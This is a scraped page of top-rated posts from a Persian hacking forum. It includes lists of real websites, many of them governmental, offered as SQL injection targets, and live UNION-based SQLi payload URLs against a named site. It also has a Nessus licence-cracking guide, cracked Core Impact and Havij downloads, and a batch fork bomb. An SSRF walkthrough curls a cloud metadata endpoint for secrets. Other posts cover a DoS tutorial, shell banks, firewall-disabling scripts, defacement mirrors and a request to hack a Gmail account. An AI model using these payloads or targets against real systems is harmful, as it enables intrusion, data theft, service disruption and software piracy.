discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. proxy

    proxy

    مدير بخش


    • امتیاز

      14

    • تعداد ارسال ها

      699


  2. mohammad178

    mohammad178

    کاربر تازه وارد


    • امتیاز

      14

    • تعداد ارسال ها

      41


  3. vext0r3

    vext0r3

    کاربر تازه وارد


    • امتیاز

      10

    • تعداد ارسال ها

      11


  4. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      9

    • تعداد ارسال ها

      2,564



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در پنجشنبه, 23 بهمن 1399 در همه بخش ها

  1. 3 امتیاز
    با سلام از wpscan استفاده کنید حتما جواب میگیرین
  2. 2 امتیاز
    موضوع تاپیک با متن درونش یکی نمیخونه و این غیر قوانینه این هم اشتباهه ! چون اصلا در مورد متن درون تاپیک نیست و هیچ صحتی نداره و فقط برای شکست قوانینه ! از قندشکن استفاده کن شاید درست بشه
  3. 2 امتیاز
    Zubeid

    تارگت های sqli

    بنا بدرخواست یکی از دوستامون 10درصد رو اینجا بزارم کپی برداری ممنوع https://www.brightlocal.com/resources/top-50-local-citation-sites/ https://moz.com/community/q/looking-to-rank-a-co-uk-domain-in-the-usa http://americanvalues.org/search/item.php?id=18 http://berkeleyrecycling.org/page.php?id=1 http://www.cacert.org/index.php?id=4 http://www.asfaa.org/members.php?id=1 https://www.eia.gov/todayinenergy/detail.php?id https://indianembassyusa.gov.in/home?id=26 http://ctrc.gov.np/content.php?id=56 https://ibm.gov.in/ http://www.nptf.gov.np/content.php?id=259 https://www.cgichicago.gov.in/page/display/125 https://dded.gov.in/detail.php?id=58 https://www.fire.nsw.gov.au/page.php?id=879 http://www.hkl.gov.my/index.php?id=384 http://www.na.gov.pk/en/pressrelease_detail.php?id=179 https://ngodarpan.gov.in/index.php http://project-lovcen.me/page.php?id=6 http://www.ir.ucg.ac.me/eng/page.php?id=10 https://bnmjjwinf292.com/j3j2ek3n?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14961612 https://stackoverflow.com/questions/6193049/php-site-url-id-please-help http://ismj.bpums.ac.ir/en https://www1.clermont.inrae.fr/wq/?id=simul&new=1 http://www-llb.cea.fr/en/Phocea/Page/index.php?id=21 http://www.spm-tourisme.fr/index.php?id=293&lieu=151 http://iscintelligence.com/event.php?id=322 http://forum15.org.il/en/Content.aspx?id=466 http://www.printmaking.co.il/artists.php?id=47 https://www.aepi.org.il/index2.php?id=1&lang=ENG http://www.nanoi.co.il/index.php/nano-instruments-gallery https://waitgirlbroke-9.live/?utm_campaign=QPF8euu28II5lw7O2iHhCidoSOXmw5oLxD6bwphw43U1&t=main9 https://www.scoollifefund.ca/index2.php?id=3
  4. 2 امتیاز
    درود ../ sudo apt-get install --reinstall python3
  5. 2 امتیاز
    Nessus یکی از کارامد ترین و قدرت ترین ابزارها در زمینه تست نفوذ و شناسایی آسیب پذیری های موجود در وب اپلیکیشن ها و شبکه میباشد . با استفاده از این روش که در ادامه توضیح میدم میتونید بصورت نامحدود از امکاناتش استفاده کنید و plugin های جدیدش رو دریافت و بدونه مشکل آپدیت کتید. ابتدا وارد تاپیک زیر بشید و اسکنر Nessus برای سیستم عامل مورد نظرتون دریافت کنید. آموزش شامل نسخه های ویندوزی و لینوکسی میباشد. https://guardiran.org/topic/9376-%D8%A7%D8%B3%DA%A9%D9%86%D8%B1-nessus-8101-%D8%A8%D9%87-%D9%87%D9%85%D8%B1%D8%A7%D9%87-%D9%BE%DA%A9%DB%8C%D8%AC-%D9%BE%D9%84%D8%A7%DA%AF%DB%8C%D9%86-%D9%87%D8%A7/ آموزش نصب و کرک Nessus در ویندوز مرحله اول : بعد از نصب کردن فایل نصبی Nessus وارد لینک زیر بشوید: https://localhost:8834/ مرحله دوم : انتخاب گزینه Managed Scanner و بعد از اون انتخاب tenable.sc طبق تصاویری که در پایین مشخص شده : بعد از نصب و استخراج فایل های اولیه با استفاده از Command Prompt ویندوز وارد مسیر زیر بشوید: C:\Program Files\Tenable\Nessus> پلاگین هایی که در تاپیک بالا قرار دادم رو دریافت کنید و با دستور زیر شروع به آپدیت آفلاین اسکنر Nessus کنید: nessuscli.exe update all-2.0.tar.gz نتیجه : [info] Copying templates version 202006091543 to C:\ProgramData\Tenable\Nessus\nessus\templates\tmp [info] Finished copying templates. [info] Moved new templates with version 202006091543 from plugins dir. * Update successful. The changes will be automatically processed by Nessus. وارد Services ویندوز بشوید و همانطور که در تصویر پایین مشاهده میکنید اقدام به ریستارت کردن سرویس Nessus تحت عنوان Tenable Nessus بشوید : بعد از ریستارت سرویس Nessus وارد صفحه https://localhost:8834/ بشوید و صبر کنید تا پلاگین ها و اپدیت های لازم نصب بشوند. پس از اتمام اپدیت فایل زیر با نام مشخص شده plugin_feed_info که در پایین ضمیمه میکنم در 2 مسیر فایل های اصلی نصب شده قرار دهید: plugin_feed_info.inc C:\ProgramData\Tenable\Nessus\nessus C:\ProgramData\Tenable\Nessus\nessus\plugins بعد از جایگزازی فایل plugin_feed_info سرویس Nessus رو دوباره ریستارت میکنید و میتونید بصورت نامحدود از این ابزار قدرتمند استفاده کنید. آموزش نصب و کرک Nessus در لینوکس عزیزان برای نسخه لینوکس هم دقیقا همین شرایطه موارد خاص رو اضافه میکنم: برای آپدیت پلاگین ها از دستور زیر استفاده کنید: /opt/nessus/sbin/nessuscli update /home/RT3N/Downloads/all-2.0.tar.gz مسیر قرار دادن فایل plugin_feed_info.inc در لینوکس: /opt/nessus/lib/nessus/plugins/ /opt/nessus/var/nessus/ دستور ریستارت کردن Nessus در لینوکس: service nessusd restart سعی کردم ساده بیان کنم توضیحات اضافی رو در پست بعدی قرار میدم تا سردرگم نیشد. موفق یاشید.
  6. 1 امتیاز
    Zed

    من چه غلطی بکنم؟

    مودب باش دوست عزیز من چه غلطی کنم یعنی چی بنویس من چی کار کنم
  7. 1 امتیاز
    سلام امیدوارم حالتون خوب باشه. @1TED جواب این بنده خدا را داده بود. اگر @icasaboys هنوز هم مشکل داشتند حتما همین جا مطرح می کردند. پس لزومی نداشت در تاپیکی که پروندش تموم شده پست ارسال کنید. ابزار های خوبی را معرفی کردید، همچنین آموزش های خوبی گذاشتید، اما اینکه بیاید روی هر تاپیک یه انتقاد بکنید بده. شما تالار اصلی را در عرض یک رو فتح کردید! اگر عزیرانی دیگر بخواهد موضوعی ارسال کنند، سریع تاپیکشان از تالار اصلی خارج میشه و ... و در مورد می تونید تارگت ها را در قسمت تارگت های تمرینی قرار بدید، نه اینکه بگید بیا پی وی ازم بگیر. اگر اینطور باشه که سنگ رو سنگ بند نمیشه. مثلا @Reza.Black، دوست خوب من ابزار های زیادی نوشتند، اگر قرار بود بگن بیاین پی وی ازم بگیرید که دیگه خیلی بد میشد. کار شما عالیه اما بالاخره هر جایی قانون خودش رو داره و باید اون قوانین رعایت بشه. امیدوارم بد برداشت نشده باشه. موفق و شاد باشید🌹
  8. 1 امتیاز
    ASLIEYDFVLSDKVN

    رد یابی هکر!

    مرسی از توضیحاتتون... به عنوان اخرین سوال....تارگت های خارجی چطور(منظورم سایت هست)؟ اون ها هم میتونند جدی پیگیری کنند؟
  9. 1 امتیاز
    SRX

    رد یابی هکر!

    اگه بخوان انجام میدن اما وقتی پیگیری آنچنان نشه یه بهونه میارن و می پیچوننت!! FBI رو هم خیلی دست بالا نگیرید، اونم همینطوره اگه موضوع سر یه چیز مهم مثل امنیت ملی باشه، یه کارایی می کنن که دهنت باز می مونه! من تا حالا به تعداد مو های سرم گزارش دادم، فقط به چندتاش به خوبی رسیدگی شده. اگر هم کاری نکنن خودم شروع می کنم و ... روزانه کلی اکانت اینستاگرام و ... کرک می شود، کلی هم گزارش در روز، ممکن است گزارش شما با اسپم ها قاطی شود!(پس نمیگم تنبل هستن و رسیدگی نمی کنن) ولی در کل اگر شاکی خوب پیگیری کنه یا وکیل خوبی داشته باشه می تونه بد بلایی سرتون بیاره این متن توسط بنده نوشته نشده و فقط جهت تاکید بیشتر می باشد -------------------------------------------------------------------------------------------------- 1. جرم دسترسی غير مجاز: طبق ‎‎‎ماده (1)، هر کسی به طور غير مجاز، به داده ‎ها يا سيستم هاي رايانه ‎اي يا مخابراتي که به وسيله تدابير امنيتي حفاظت شده است، دسترسي يابد، به حبس از نود و يک روز تا يک سال يا جزاي نقدي از پنج تا بيست ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. 2. جرم شنود غير مجاز یکی دیگر از مجازات جرایم سایبری: ‎‎‎طبق ماده (2)، هر کسی به طور غير مجاز، محتواي در حال انتقال ارتباطات غير عمومي در سيستم هاي رايانه اي يا مخابراتي يا امواج الکترو مغناطيسي يا نوري را شنود کند، به حبس از شش ماه تا دو سال يا جزاي نقدي از ده تا چهل ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. 3. جرم جاسوسي رايانه‎ اي طبق ماده (3)، هر کسی به طور غير مجاز نسبت به داده اي سري در حال انتقال يا ذخيره شده در سيستم هاي رايانه اي يا مخابراتي يا حامل هاي داده، مرتکب اعمال زير شود،‌ به مجازات هاي مقرر محکوم خواهد شد: الف) دسترسي به داده اي مذکور يا تحصيل آنها يا شنود محتواي سري در حال انتقال، به حبس از يک تا سه سال يا جزاي نقدي از بيست تا شصت ميليون ريال يا هر دو مجازات. ب) در دسترس قرار دادن داده اي مذکور براي اشخاص فاقد صلاحيت به حبس از دو تا ده سال. ج) افشاء يا در دسترس قرار دادن داده اي مذکور براي دولت، سازمان، شرکت يا گروه بيگانه يا عاملان آنها، به حبس از پنج تا پانزده سال. تبصره 1. داده اي سري، داده اي است که افشاي آنها به امنيت کشور يا منافع ملي لطمه مي‎زند. طبق ماده (4)، هر کسی به قصد دسترسي به داده اي سري موضوع ماده (3) اين قانون،‌ تدابير امنيتي سيستم هاي رايانه اي يا مخابراتي را نقض کند، به حبس از شش ماه تا دو سال يا جزاي نقدي از ده تا چهل ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. ‎‎‎ماده (5) چنانچه مأموران دولتي که مسئول حفظ داده اي سري مقرر در ماده (3) اين قانون يا سيستم‌ هاي مربوط هستند و به آنها آموزش لازم داده شده است يا داده‌ ها يا سيستم‌ هاي مذکور در اختيار آنها قرار گرفته است، بر اثر بي احتياطي، بي مبالاتي يا عدم رعايت تدابير امنيتي موجب دسترسي اشخاص فاقد صلاحيت به داده ها، حامل هاي داده يا سيستم هاي مذکور شوند، به حبس از نود و يک روز تا دو سال يا جزاي نقدي از پنج تا چهل ميليون ريال يا هر دو مجازات و انفصال از خدمت از شش ماه تا دو سال محکوم خواهند شد. 4. جرم جعل رايانه اي طبق ماده (6)، هر کسی به طور غير مجاز مرتکب اعمال زير شود، جاعل محسوب و به حبس از يک تا پنج سال يا جزاي نقدي از بيست تا يکصد ميليون ريال يا هر دو مجازات محکوم خواهد شد: الف) تغيير داده اي قابل استناد يا ايجاد يا وارد کردن متقلبانه داده ها. ب) تغيير داده ها يا علايم موجود در کارت هاي حافظه يا قابل پردازش در سيستم‌ هاي رايانه اي يا مخابراتي يا تراشه ها يا ايجاد يا وارد کردن متقلبانه داده ها يا علايم به آنها. طبق ماده (7)، هر کسی با علم به مجعول بودن داده ها يا کارت ها يا تراشه ها از آنها استفاده کند، به مجازات مندرج در ماده فوق محکوم خواهد شد. طبق ماده (8)، هر کسی به طور غير مجاز داده ديگري را از سيستم هاي رايانه اي يا مخابراتي يا حامل هاي داده حذف يا تخريب يا مختل يا غير قابل پردازش کند،‌ به حبس از شش ماه تا دو سال يا جزاي نقدي از ده تا چهل ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. ماده (9)، هر کسی به طور غير مجاز با انجام اعمالي از قبيل وارد کردن، انتقال دادن، پخش، حذف کردن، متوقف کردن، دستکاري يا تخريب داده ها يا امواج الکترومغناطيسي يا نوري، سيستم هاي رايانه اي يا مخابراتي ديگري را از کار بيندازد يا کارکرد آنها را مختل کند، به حبس از شش ماه تا دو سال يا جزاي نقدي از ده تا چهل ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. ماده (10)، هر کسی به طور غير مجاز با انجام اعمالي از قبيل مخفي کردن داده‌ ها، تغيير گذرواژه يا رمزنگاري داده‌ ها مانع دسترسي اشخاص مجاز به داده ها يا سيستم هاي رايانه اي يا مخابراتي شود، به حبس از نود و يک روز تا يک سال يا جزاي نقدي از پنج تا بيست ميليون ريال يا هر دو مجازات جرایم سایبری محکوم خواهد شد. ‎‎‎ ماده (11)، هر کسی به قصد به خطر انداختن امنيت يا آسايش عمومي اعمال مذکور در مواد (8)، (9) و (10) اين قانون را عليه سيستم‌ هاي رايانه‌ اي و مخابراتي که براي ارائه خدمات ضروري عمومي به کار مي‌روند، از قبيل خدمات درماني، آب، برق، گاز، مخابرات، حمل و نقل و بانکداري مرتکب شود، به حبس از سه تا ده سال محکوم خواهد شد. منبع : http://negin-edalat.ir/جرایم-سایبری/ -------------------------------------------------------------------------------------------------- موفق باشید🌹🌹
  10. 1 امتیاز
    Mr.Night

    رد یابی هکر!

    تا اون جایی که شنیدم میشه ردیابی کرد ولی بلد نیستم کاری کنم که نتونه ردیابی کنه
  11. 1 امتیاز
    سلام تو این تاپیک می خوام چندتا افزونه بهتون معرفی کنم اولین افزونه wappalyzer هستش کاری که این افزونه انجام میشه این هست که اطلاعاتی رو در مورد سایت هدف به ما میده (من خیلی از cms ها رو با استفاده از همین ابزار پیدا کردم ) ابزار بعدی shodan هستش که اطلاعات خوبی رو در مورد سرور سایت به ما میده از جمله ایپش پورت های بازش موقعیت مکانی و . . . ابزار بعدی hack target هستش که می تونید با استفاده از اون whois , ping , و . . . از تارگت بگیریم در کل کار های زیادی انجام میده و افزونه خیلی خوبی هستش افزونه بعدی همیشه باید یک vpn باشه (چون ما نمی خوایم ایپیمون لو بره و دهنمون سرویس میشه بخوایم یک کشوری رو پیدا کنیم که سایت اوسکل اباد روش فیلتر نباشه) اینجوری راحتر می تونیم ایپی مجاز رو پیدا کنیم و ایمن تر هم هستش امید وارم به کارتون بیاد تا تاپیک بعدی که بعید میدونم در پناه حق 👋
  12. 1 امتیاز
    معذرت می خواهم، داشتم تاپیک رو مرور می کردم دیدم آدرس سایت رو نذاشتم🤦‍♂️ وب سایت: https://www.onworks.net
  13. 1 امتیاز
    RT3N

    دانلود اسکنر Core Impact

    اسکنر Core Impact یکی از قدیمیترین و کارامد ترین اسکنر های دنیا بحساب میاد خیلی از کارشناسان از Core Impact بعنوان برترین اسکنر موجود نام میبرند. البته ناگفته نماند که تمام اسکتر های مطرح ایده های مختص به خودشون رو دارند و وجه تمایز هاشون باعث محبوبیت و شناخته شدنشون شده اما اسکنر Core impact خلاصه ای از تمام اسکنر های مطرح شده میباشد . شما این اسکنر رو نمیتونید براحتی بدست بیارید نسبت به سایر اسکنر ها (در ایران چونکه عموما ما از نسخه های دستکاری و کرک شده استفاده میکنم در کمتر مواقعی پیش میاد اقدام به خرید لایسنس کنیم ) حتی نسخه دمو دسترسی بهش سخته و باید ثبت نام کنید و بعد از برسی برای شما ارسال میشه , سیاست های خاص خودشون رو دارند. به همین دلیله که زیاد در دسترس نیست و کمتر ازش صحبت میشه چون که فایل نصبیش رو هم اگر گیر بیارید برای دیکریپت و شروع نصب نصب نیاز به کد ارسالی از طرف شرکت core دارید. Core Impact همچنین با آسیب پذیری بیش از 20 اسکنر محبوب ، از جمله Burp Suite ، Nessus و Qualys ادغام شده لیست آسیب پذیری های اسکنر های ادغام شده: Acunetix Web Vulnerability Scanner • Burp Suite Professional • Cenzic • GFI LANguard • HP WebInspect • IBM Enterprise Scanner • IBM Internet Scanner • IBM Rational AppScan • McAfee Vulnerability Manager (formerly McAfee Foundstone) • Microsoft Baseline • nCircle • Nessus • Nexpose • Nmap • NTOSpider • Patchilnk VMS • Qualys Guard • Qualys Web Application Scanner • Retine • SAINT • STAT Guardian • Tenable Security Center • Tripwire IP360 بعد ار شناسایی آسیب پذیری با استفاده از اکسپلویت های موجود که در فایل های نصبیش جای داده میتونه به شما دسترسی های لازم رو از تارگت به کاربرش بده که در نوع خودش کم نظیر هستش.. شما میتونید در قالب ماژول ابزار متاسپلویت رو بهش اضافه کنید . سعی کردم بصورت ساده و گذرا و خلاصه شده از این ابزار بسیار مهم و کارامد مطلبی رو ارایه بدم الزامی هستش که فایل زیر رو مطالعه کنید کاملا توضیحات داده شده. cs-core-impact-ds.pdf Core_Impact_User_Guide_19.1.pdf عزیزان ضروری هستش قبل از استفاده از اسکنر فایل های بالا رو مطالعه کنید مخصوصا Core_Impact_User_Guide_19.1 ... بشدت پیشنهاد میدم. و اما بحث اصلی بنده core impact نسخه 19.1 رو برای دانلود قرار میدم : CORE_IMPACT-19.1-PLAIN.part1.rar CORE_IMPACT-19.1-PLAIN.part2.rar CORE_IMPACT-19.1-PLAIN.part3.rar برای کرک وارد تاپیک زیر بشوید: https://guardiran.org/topic/9374-%D8%A7%D8%A8%D8%B2%D8%A7%D8%B1%D9%87%D8%A7%DB%8C-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D8%A8%D9%87-%D9%87%D9%85%D8%B1%D8%A7%D9%87-%DA%A9%D8%B1%DA%A9-%D9%88-%D9%84%D8%A7%DB%8C%D8%B3%D9%86%D8%B3/ پسورد : guardiran.org موفق باشید/
  14. 1 امتیاز
    با سلام در کل ممنون بابت تا‍پیکتون اما من با توضیحاتتون در تاپیک (زبان های برنامه نویسی هک و غیر هک ) با توضیحاتتون برای پرل و روبی سی و سی پلاس پلاس و ... مشکل دارم و همچنین جاوا هم درج کنید یا همینطور پی اچ پی یا .... و این هم بگم الان انتظار ۱۰ لایک(پسند) و ۱۰۰۰ بازدید از پستتون نداشته باشید چون فاقد محتوا یا اعتبار هست و در نظر داشته باشیم که ما زبانی مختص هک نداریم ! شما حتی به زبان ساده ای مثل اچ تی ام ال هم در پنتست نیاز پیدا میکنید پس در واقع ما مشخض میکنیم که از چه زبانی چه استفاده ای بکنیم این هم اضافه کنم که البته این نظر شخصی بنده هست (همونطور که میبینید مدیران عزیز و دوستان لایک(پسند)کردند) موفق باشید
  15. 1 امتیاز
    سلام من یکساله پیش پایتون رو شروع کردم و تاالان کتابخونه هایی که برای هک و امنیت بدردم نخورده رو خوندم مثل pyqt5 اگر یکی اسم تموم کتابخونه هایی رو که باید برای این زمینه یاد گرفت رو بگه خیلی خوبه (فقط برای حملات سایت نه کلا همه چی (یه دید کلیم به کتابخونه ها پیدا کنم خیلی خوبه چون کتابخونه های درست رو یاد نگرفتم )) ممنون
  16. 1 امتیاز
    vext0r3

    vbscript

    سلام دوستان کسی اینجا vbscript کار کرده میخوام یه شی بسازم نمیشه این ارور رو میده !!
  17. 1 امتیاز
    vext0r3

    batch scripting

    سلام اقا %0|%0 دقیقا یعنی چی ؟ اینم کد کاملش schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc onlogon /sd 12/27/2050 @echo off cls %0|%0
  18. 1 امتیاز
    R3dC0d3r

    batch scripting

    خیلی تفاوت هست : - loop کارش ایجاد یک حلقه برای اجرای یک سری دستورات تکراری از سطح بالا می باشد - goto یک دستور سطج پایین (منطق قابل درک برای پردازشگر) به جهت پرش از یک خط به خط دیگر می باشد اما 0%|0% ، به کمک علامت | پردازه ای ایجاد میکنه که همزمان کپی از همون پردازه رو اجرا میکنه و این باعث کاهش روند سیستم خواهد شد . منظورم از اشاره به loop رسوندن هدف از ویروس نویسی این سبکی بود ، شخص کد بی منطقی مینویسه که باعث بشه سیستم out of memory بشه . موفق باشید
  19. 1 امتیاز
    mownten

    تارگت های Sql Injection

    https://www.achromicpoint.com/past-event.php?id=50' and 1 and '0'='1-- https://www.achromicpoint.com/past-event.php?id=-50%27+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
  20. 1 امتیاز
    BlackshadoW

    SSRF

    توضیحاتتون خیلی عالی بود یه خواهش ازت دارم چون من قبلا با باگ SSRF هیچ زد و خوردی نداشتم فقط درحد اطلاعات شفاهی چیزهایی بدست آوردم که نمی تونم روش کار کنم اگه لطف داشتی یه فایل آموزشی ویدیویی از روشی که با کالی تست می کنی برامون بفرستی خیلی ممنون میشم حتی خواستین من سایتی که باگ SSRf داره بدم
  21. 1 امتیاز
    mrmesvak

    SSRF

    نه عزیز اشتباه میکنی برای همه چیز بدرد میخوره خب بزار از طریف ssrf شروع کنیم که ببینیم باگی که شما پیدا کردید اصلا این هست یا نه خب امید وارم با واژه ی uri اشنایی داشته باشید وقت شما میتونید در یک سایت لینکی بزارید مثلا شما به یک سایت url میدید که اون رو که یک عکس یا بکگراند هست رو روی پروفایل یا بکگراند فروم شما بزاره خب حالا این میتونه webhook ها باشه یا ..... پس شما هر uri که بدید این تبدیل به csv میشه یا بقول خودمونی هر لینکی شما بدید سرور تبدیل به دیتاش میکنه یا میریزتش توی فایلی که csv هست خب حالا اگر ما با چیزی مثل etc/password/.... که توی sqli هم هست یا /admin/add_user /user:mesvak&password: something اون لینک مون رو بفرستیم شما میتونید یک یوزر پسورد بدون هیچ لوگین کردنی به ادمین یا پنل بسازید از اون etc/password هم مطمعنن میدونید میشه دیتابیس و هرچیزی که میخواید رو بگیرید ولی یک مقدار کار پیچیده ای هست اموزشی براتون اماده میکنم میزارم بزودی که میشه دیتا رو هم بگیری ولی بیشتر مواقع یا نمیشه بایپس کرد مثلا سایتای بزرگ و خوبی مثل ebay امتحان کردم نشد بستگی به امنیت اون سایت ها هم داره و یک طور بایپس پیاده میکنید و چیز جالب درباره ی این باگ اینه که چون یک مقدار پیچدست و دانش کد زنی داشته باشی تا یک چیزارو بگذرونی و اکسپلویت های زیادی براش نیست پس خیلی از سایت های خوب دارند ولی کسی نمیدونه (برعکس sqli) درباه گرفتن اطلاعات که گفتید بله میشه قشنگ اطلاعات خیلی زیادی ازش بدست اورد و حتی پورت ها رو عوض کنید که بایپس کنید چون معمولا سایت ها یی که امنیت بالایی دارند 1- فقط پورت های 443 و 80 رو باز میزارند که میدونید برای چی هست 2-فقط ایپی سایت رو مخصوص هاست خارجی قرار میدند یعنی شما به دیتا دسترسی نخواهی داشت (بندرت دیده میشه ولی ای بی اینکارو کرده ) 3-و قطع دسترسی هرگونه پروتکلی که https or http نیست خب برای بایپس کردنشون باید راهی مخالف اینا پیدا کنی اولی میشه من تو کالی یک پیلود و اکسپلویت دارم که اینکارو کردم پابلیکش نمیکنم و قسمت دوم رو راهی فعلا ندارم قسمت سوم هم بایپسش توی اینترنت فکر کنم هست ولی بگیر نگیر داره برای مثال یک سمپل قدیمی میزنم یک سایتی خیلی وقت پیش تقریبا 2 هفته پیش این شکلی یک پیلود yml اپ شده و apis رو گرفتم metadata بخش مهمی که براحتی میتونی با این باگ دسترسی پیدا کنی و api سایت و توکن و حتی تموم سورس ها مثل این مثال ببینی خب این سایت خودش یک رانر بود روی لینوکس یعنی برنامشو نصب میکردی و فایل هایی با فرمت yml رو ران میکرد پس یک فایل میسازیم با فرمت yml توش اکسپلویتمون رو میزاریم image: node:latest cache: paths: - node_modules/ test: stage: test script: - npm install - npm test pack: stage: deploy script: - chmod +x run.sh - ./run.sh - npm install - npm pack artifacts: paths: - ./*.tgz پسوند رو باید یک چیزی بزاری که بتونه نفوذ کنه خوب این برنامه این رو یک طور دیباگ استارت میکنه اگر اینطوری بزاری gitlab-ci.yml پس یک فایل با این پسوند میسازیم بعد میزنیم دستور لینوکس رو اینطوری curl -L http://169.254.169.254/metadata/v1/ خب کرل همونطور که میدونی دیتای اون قسمت هاست رو بما میده خوب پس ما یک اکسپلویت اجرا کردیم و حالا اون قسمتم بعدش اجرا میکنیم که ببینیم ایا اطلاعاتی بما میده از اون قسمت یا نه اگر در حالت معمولی باشه هیچی نمیده ولی بعد از دو بار ران کردنه پیلود بالا اینارو میشه گرفت id hostname user-data vendor-data public-keys region interfaces/ dns/ floating_ip/ tags/ features/ خب اینا همون چیزای خصوصی و شخصی سرور که گفتم میبینی چه چیزایی نشون داده و ما به چه داده هایی دسترسی داریم حالا با دستور cd وارد هر کدوم خواستی میشی و ls میگیری هر بار که ببینی کجایی چی ران و.... هر چیم خواستی بدرد خور بود با دستور فایل چکش میکنی دانلودش میکنی و اینا اخرش بگم bug bounty اگر شنیده باشی این روزا خیلی کاربرد داره تقریبا هکر ها رو بروش خوبی برده که با هک کردن بصورت قانونی پول در میاری و این باگ هم داغ این روزا بازارش برای همین باگ بالا سایت سازندش 4000 دلار داد
  22. 1 امتیاز
    با عرض سلام و اقا من به یه سایت دسترسی دارم و میتونم شل اپلود کنم منتها وقتی شل اپلوئ میشه سریع سرور بلاک میکنه فایل رو و سرور لینوکس هست و باید چیکار کنم ؟؟؟ خیلی فوری خیلی فوری
  23. 1 امتیاز
    ۶. Wifiphisher می‌توان گفت WiFiPhisher ابزاری است که برای راه اندازی حملات فیشینگ و مرد میانی، علیه کاربران وای فای به کار گرفته می‌شود. دانلود : Download
  24. 1 امتیاز
    با سلام امروز میخوام در این پست ابزار وایرلسی که یک هکر به آن نیاز داره رو معرفی کنم نکته : سوالات خودتون رو در پستی جدا بگید در حد توان پاسخگو خواهم بود از مدیر بخش میخوام که اگه لازم میدونن پست مهم بشه ۱. Fern WiFi Wireless Cracker یکی از بهترین ابزار هک وایرلس که به صورت رایگان میتونید اون رو دانلود کنید لازم به ذکر هست که این ابزار در کالی به صورت پیشفرض موجود هست دانلود : Download
  25. 1 امتیاز
    سلام. آموزش ویدیویی حمله مخرب دی داس از طریق نرم افزار xerxes توی محیط کالی رو گذاشتم. توی این آموزش میبینیم که چطور میتونیم بار ترافیکی یک وبسایت رو زیاد کنیم و یه حمله قوی علیه تارگت داشته باشیم. حجم 11 مگ. رمز عبور نداره. dos.rar
  26. 1 امتیاز
    ۴. Metasploit این ابزار نیاز به توضیح نداره همه میشناسن دیگه یک نرم‌افزار قوی برای نفوذ به سیستم‌های دیگر است. این نرم‌افزار امکان دسترسی به شل قربانی را به راحتی حتی بر روی ویندوز ۷ فراهم می‌کند. دانلود : Download
  27. 1 امتیاز
    ۳. KisMAC KisMAC برای Mac OSX و Kismet برای Linux به دانشی پیشرفته نیاز دارند اما از طریق brute force به شکستن کلیدهای WEP و WPA و سوء‌استفاده از آسیب‌پذیری‌های حاصل از scheduling ضعیف و کلیدهایی که به شکلی نامناسب ایجاد شده‌اند کمک می‌کند. دانلود : Download Kismet دانلود : Download
  28. 1 امتیاز
    Mr.Nashena3

    Havij v1.16 Pro Cracked

    داشتم تو انجمن میگشتم ببینم بخش هک چی داره چی کم داره یه آنالیز کوچیک دیدم این ورژن از هویج در انجمن نیست من فکر میکنم این ورژن بهترین ورژن هست. پیوست شد Pro.part1.rar Pro.part2.rar
  29. 1 امتیاز
    http://zone-h.com/mirror/id/29800589 http://zone-h.com/mirror/id/29800580 http://zone-h.com/mirror/id/29800553
  30. 1 امتیاز
    ببخشید برای encoder ها در اندروید باید از کدام استفاده کرد مثلا برای پیلود ویندوز از توشیکا میشه استفاده کرد برای اندروید باید از کدام استفاده کرد؟؟؟
  31. 1 امتیاز
    d با سلام و ممنون از پاسخ شما... اگه امکانش هست میشه عکس های پایین رو چک کنید و ببینید مشکلی وجود داره یا نه؟!! http://s7.picofile.com/file/8258502368/Capture_2016_07_03_12_51_21_73.png http://s6.picofile.com/file/8258501942/Capture_2016_07_03_12_54_43_201.png در آخر کار هم اینجا گیر میکنم....!!! http://s7.picofile.com/file/8258502768/photo_2016_06_29_23_17_37.jpg ممنون میشم راهنمایی کنید...
  32. 1 امتیاز
    یک سرچ میکردین بد نبود تو امضای من موجوده http://guardiran.org/forums/topic/3884-%D8%AA%D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D8%A7%D9%86%D8%AF%D8%B1%D9%88%DB%8C%D8%AF-%D8%A8%D8%A7-%D8%A2%D8%B1%D9%85%DB%8C%D8%AA%DB%8C%D8%AC/ موفق باشید
  33. 1 امتیاز
    فصل سوم ویژوال بیسیک با استفاده از کد زیر می توانید فایروال تارگت مورد نظر رو از کار بیندازید firewall off.txt
  34. 1 امتیاز
    بع اکانت جمیلی که از من دزدیدن
  35. 1 امتیاز
    بله اما جنی موشن خیلی از امکانات رو نداره و همچنین رابط کاربری ضعیف و البته حجم خیلی بالایی داره به این جهت این نرم افزار رو ما معرفی کردیم موفق و سربلند باشید
  36. 1 امتیاز
    ahriman089

    vps fori

    به منم یه vps بدین
  37. 1 امتیاز
    ممنون از شما مدیر عزیز.. یک سوال دیگه..من به جای FILE.exe هر فایلی رو با هر پسوندی میتونم قرار بدم؟؟ مثلا ویروس من .bat هست...اجرا میکنه؟؟ ممنون از جواب هاتون
  38. 1 امتیاز
    Ehsan68

    هک جمیل

    سلام درخواست کمک دارم
  39. 1 امتیاز
    DeMoN

    بانک شل

    سلام به همه... همراه شما هستیم با بقیه شل ها اینم شل بعدی:SyRiaN Sell یا حق SyRiAn Shell.rar
  40. 1 امتیاز
    DeMoN

    بانک شل

    سلام دوستان... اینم دوازدهمین شل:Login login.rar
  41. 1 امتیاز
